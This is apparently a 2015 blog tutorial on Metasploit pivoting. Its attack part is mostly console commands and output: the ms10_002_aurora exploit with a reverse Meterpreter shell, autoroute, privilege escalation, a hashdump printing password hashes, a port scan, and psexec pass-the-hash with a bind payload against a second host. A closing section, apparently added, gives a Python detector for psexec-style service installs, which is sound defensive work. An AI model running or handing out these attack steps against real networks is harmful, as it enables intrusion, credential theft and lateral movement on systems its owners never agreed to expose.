By: Multi Thinker
July 14, 2015

Metasploit: Routing Traffic from a Non-Routable Network

According to Offensive-Security:
Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.

In this scenario, we'll be using it for routing traffic from a normally non-routable network.

For this, we'll use the exploit "exploit/windows/browser/ms10_002_aurora":

msf > use exploit/windows/browser/ms10_002_aurora

We need to set URIPATH along with LHOST:

msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx

With a lookup on sessions, we have:

msf exploit(ms10_002_aurora) > sessions -l

Now we need the subnet mask and route discovery for that:

meterpreter > run autoroute -h
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s xx.x.x.x -n # Add a route to x.x.x.x/
[*]   run autoroute -s x.x.x.x                # Netmask defaults to
[*]   run autoroute -s x.x.x.x/24             # CIDR notation is also okay
[*]   run autoroute -p                        # Print active routing table
[*]   run autoroute -d -s x.x.x.x             # Deletes the x.x.x.x/ route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
meterpreter > run autoroute -s x.x.x.x/24
[*] Adding a route to x.x.x.x/
[+] Added route to x.x.x.x/ via
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   x.x.x.x      Session 1

Why did I do this? We need to route traffic through the session and act like that IP. Try typing ifconfig and you'll see your victim in your route. We need to use that IP, so I've routed it with the subnet mask.

Now, we need to access that system, too. Let's get it by typing getsystem, then exploit with the pass-the-hash method recently explained.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c2ec80f879c1123b5dc8d24f1xxe2c37a45...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:81cbcea8a9af9as3bbaad3b435b51404ee:561cbdae13dded5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3sd435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::
SUPPORT_s388945a0:1002:aad3b435b51404eeaad3b435b51das404ee:ebf9fa44b3204029db5a8a77f5350160:::
Thinker:1004:81casbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5aasbd30aa94ddeb3cf52d:::

We need to use bind_tcp over the network. For that, we can first use the TCP port scanner module (auxiliary/scanner/portscan/tcp) to find open ports on the routed subnet:

msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output

msf auxiliary(tcp) > set RHOSTS x.x.x.x/24
RHOSTS => x.x.x.x/24
msf auxiliary(tcp) > set PORTS 179,445
PORTS => 179,445
msf auxiliary(tcp) > set THREADS 20
THREADS => 20
msf auxiliary(tcp) > run
[*] x.x.x.x:445 - TCP OPEN

Follow these steps to pass the hash and use bind_tcp for pivoting:

msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(psexec) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created qANuICKyR.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (UOtrbJMd - "AuiSy")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting ssWSdV.exe...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened ( -> x.x.x.x:4444) at Mon Jul 11 12:56:42 -0700 2015

Voila! We've done it. Just type ipconfig to see that we are using our victim's connection and are connected to that system that wasn't normally connected (it was not on a LAN or any other connection).

-- Multi Thinker
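
From the defender's side, the pass-the-hash and psexec steps above leave a recognizable pair of events on the second host: an NTLM network logon (event 4624, logon type 3) followed within seconds by a service install (event 7045) whose executable sits directly in the Windows directory. The following is an added example, not part of the original post; the event records are constructed and simplified, and the host name, IP addresses, timestamps and 60-second window are assumptions (the service and file names are the ones shown in the psexec output above).

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified events as they might be collected from the second
# host's Security (4624) and System (7045) logs. Field names are assumptions.
EVENTS = [
    {"time": "2015-07-11T12:40:02", "id": 4624, "host": "SRV02", "user": "backup",
     "logon_type": 3, "auth_pkg": "Kerberos", "src_ip": "10.0.0.7"},
    {"time": "2015-07-11T12:56:38", "id": 4624, "host": "SRV02", "user": "Administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "10.0.0.23"},
    {"time": "2015-07-11T12:56:40", "id": 7045, "host": "SRV02",
     "service": "UOtrbJMd", "image_path": r"%SYSTEMROOT%\qANuICKyR.exe"},
    {"time": "2015-07-11T13:30:00", "id": 7045, "host": "SRV02",
     "service": "AcmeUpdater", "image_path": r"C:\Program Files\Acme\updater.exe"},
]

WINDOW = timedelta(seconds=60)  # assumed correlation window

# An executable placed directly in the Windows directory (where ADMIN$ points),
# not in a subdirectory such as System32.
ROOT_EXE = re.compile(
    r"^(%systemroot%|[a-z]:\\windows|\\\\[^\\]+\\admin\$)\\[^\\]+\.exe$", re.I)

def ts(event):
    return datetime.fromisoformat(event["time"])

def find_psexec_style_installs(events):
    """Return (logon, service_install) pairs matching the pattern."""
    logons = [e for e in events
              if e["id"] == 4624 and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM"]
    hits = []
    for svc in (e for e in events if e["id"] == 7045):
        if not ROOT_EXE.match(svc["image_path"].strip('"')):
            continue
        for lg in logons:
            # Same host, and the install follows the logon within the window.
            if lg["host"] == svc["host"] and timedelta(0) <= ts(svc) - ts(lg) <= WINDOW:
                hits.append((lg, svc))
    return hits

if __name__ == "__main__":
    for lg, svc in find_psexec_style_installs(EVENTS):
        print(f'{svc["host"]}: service {svc["service"]} ({svc["image_path"]}) installed '
              f'{(ts(svc) - ts(lg)).seconds}s after NTLM network logon by '
              f'{lg["user"]} from {lg["src_ip"]}')
```

Because the module removes the service and deletes the file immediately, the install event and the preceding logon are often the only durable traces, which is why the correlation keys on them rather than on the file itself.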